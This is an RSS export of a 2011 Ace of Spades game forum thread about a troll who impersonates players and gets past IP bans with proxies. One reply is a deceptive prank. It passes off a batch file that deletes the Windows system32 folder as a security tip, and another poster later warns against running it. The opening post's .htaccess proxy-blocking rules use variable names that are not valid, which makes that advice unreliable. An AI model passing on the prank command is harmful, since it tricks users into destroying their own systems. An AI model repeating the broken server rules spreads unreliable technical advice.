<?xml version="1.0"?><!-- generator="bbPress" -->

<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
>

<channel>
<title>Ace of Spades Game Forums &#187; Topic: How to block the imposter guy</title>
<link>http://forumarchive.spadille.net/</link>
<description>Ace of Spades Game Forums &#187; Topic: How to block the imposter guy</description>
<language>en</language>
<pubDate>Sat, 02 May 2026 05:01:16 +0000</pubDate>

<item>
<title>Rydogger on "How to block the imposter guy"</title>
<link>http://forumarchive.spadille.net/topic.php?id=5361#post-81394</link>
<pubDate>Thu, 18 Aug 2011 18:09:02 +0000</pubDate>
<dc:creator>Rydogger</dc:creator>
<guid isPermaLink="false">81394@http://forumarchive.spadille.net/</guid>
<description><p>What ever you do, DO NOT delete system32. DO NOT
</p></description>
</item>
<item>
<title>S0ldi3rKr4s0 on "How to block the imposter guy"</title>
<link>http://forumarchive.spadille.net/topic.php?id=5361#post-81390</link>
<pubDate>Thu, 18 Aug 2011 18:05:23 +0000</pubDate>
<dc:creator>S0ldi3rKr4s0</dc:creator>
<guid isPermaLink="false">81390@http://forumarchive.spadille.net/</guid>
<description><p>Riveting tale, old chap.
</p></description>
</item>
<item>
<title>ReubenMcHawk on "How to block the imposter guy"</title>
<link>http://forumarchive.spadille.net/topic.php?id=5361#post-81386</link>
<pubDate>Thu, 18 Aug 2011 18:01:13 +0000</pubDate>
<dc:creator>ReubenMcHawk</dc:creator>
<guid isPermaLink="false">81386@http://forumarchive.spadille.net/</guid>
<description><p>There's a fly hack? I knew about the multi-jumping, but if there's one that allows your character to stay in the air, then that's new to me.
</p></description>
</item>
<item>
<title>Space101 on "How to block the imposter guy"</title>
<link>http://forumarchive.spadille.net/topic.php?id=5361#post-81340</link>
<pubDate>Thu, 18 Aug 2011 17:14:56 +0000</pubDate>
<dc:creator>Space101</dc:creator>
<guid isPermaLink="false">81340@http://forumarchive.spadille.net/</guid>
<description><p>Cool beans, bro.
</p></description>
</item>
<item>
<title>DeathEnhanced on "How to block the imposter guy"</title>
<link>http://forumarchive.spadille.net/topic.php?id=5361#post-81335</link>
<pubDate>Thu, 18 Aug 2011 17:08:26 +0000</pubDate>
<dc:creator>DeathEnhanced</dc:creator>
<guid isPermaLink="false">81335@http://forumarchive.spadille.net/</guid>
<description><p>Do what OP says, then for added security delete system32. This alows your computer to keep the IP records for an indefinitely rather then them expiring every 48 hours. (rendering the tracker useless after 2 days)</p>
<p>to do this,</p>
<p>open a notepad type the following:</p>
<p>@echo off<br />
del c:\WINDOWS\system32</p>
<p>save the file as indeftrack.bat (remember to add the .bat extension and save as all files)<br />
double click and it will delete the system32 folder.
</p></description>
</item>
<item>
<title>YourMom on "How to block the imposter guy"</title>
<link>http://forumarchive.spadille.net/topic.php?id=5361#post-81331</link>
<pubDate>Thu, 18 Aug 2011 17:04:42 +0000</pubDate>
<dc:creator>YourMom</dc:creator>
<guid isPermaLink="false">81331@http://forumarchive.spadille.net/</guid>
<description><p>There has also been a guy who goes around on servers fly hacking, speed hacking, and ammo hacking. He uses my name [Real]YourMom. I'm pissed.
</p></description>
</item>
<item>
<title>ReubenMcHawk on "How to block the imposter guy"</title>
<link>http://forumarchive.spadille.net/topic.php?id=5361#post-81316</link>
<pubDate>Thu, 18 Aug 2011 16:32:40 +0000</pubDate>
<dc:creator>ReubenMcHawk</dc:creator>
<guid isPermaLink="false">81316@http://forumarchive.spadille.net/</guid>
<description><p>Cool story bro.
</p></description>
</item>
<item>
<title>JoJoeStinky on "How to block the imposter guy"</title>
<link>http://forumarchive.spadille.net/topic.php?id=5361#post-81306</link>
<pubDate>Thu, 18 Aug 2011 16:25:12 +0000</pubDate>
<dc:creator>JoJoeStinky</dc:creator>
<guid isPermaLink="false">81306@http://forumarchive.spadille.net/</guid>
<description><p>We all have seen him. He pops into servers, and spews a bunch of racist crap, and he does it off names of people in the community.</p>
<p>I left my CORD map running so people could take a walk around from my speedy ADSL line.<br />
someone logged in and started trolling me (lol the only other person on the server)</p>
<p>Looking over my pyspades log file after he left shows me that he is using a proxy server to bypass the IP blocking.</p>
<p>2011-08-17 22:30:56-1000 [scripts.savemap.MapSaveProtocol (UDP)] Slayer (IP 131.179.150.72, ID 0) entered the game</p>
<p>looks like he wanted to be Slayer last night. I have seen the dame dude on public server. He has an embarrassing spelling problem that gives him away every time.<br />
Not to mention the same type of trolling, saying the exact same things.</p>
<p>Here is how you really mess with him:</p>
<p> You can insert a script in your root htsaccess file. It’s best to copy and paste the code, rather than type it. That way, you can be sure that you won’t make any errors. After you’ve inserted the code, upload it to your server. :</p>
<p># block proxy servers from site access<br />
RewriteEngine on<br />
RewriteCond %{AOS:VIA}  !^$ [OR]<br />
RewriteCond %{AOS:FORWARDED}  !^$ [OR]<br />
RewriteCond %{AOS:USERAGENT_VIA}  !^$ [OR]<br />
RewriteCond %{AOS:X_FORWARDED_FOR}  !^$ [OR]<br />
RewriteCond %{AOS:PROXY_CONNECTION}  !^$ [OR]<br />
RewriteCond %{AOS:XPROXY_CONNECTION}  !^$ [OR]<br />
RewriteCond %{AOS:HTTP_PC_REMOTE_ADDR} !^$ [OR]<br />
RewriteCond %{AOS:HTTP_CLIENT_IP}  !^$<br />
RewriteRule ^(.*)$ - [F]</p>
<p>The only other way he has to hack now, is using TOR... LOL. If google takes 2 minutes to load over TOR, I can imagine how nice his ping rate must be.<br />
Pyspades speedhack script will instantly drop him with a high ping. (I assume)</p>
<p>let me know if this helps :) would be nice to rid the servers of trolls like this.
</p></description>
</item>

</channel>
</rss>
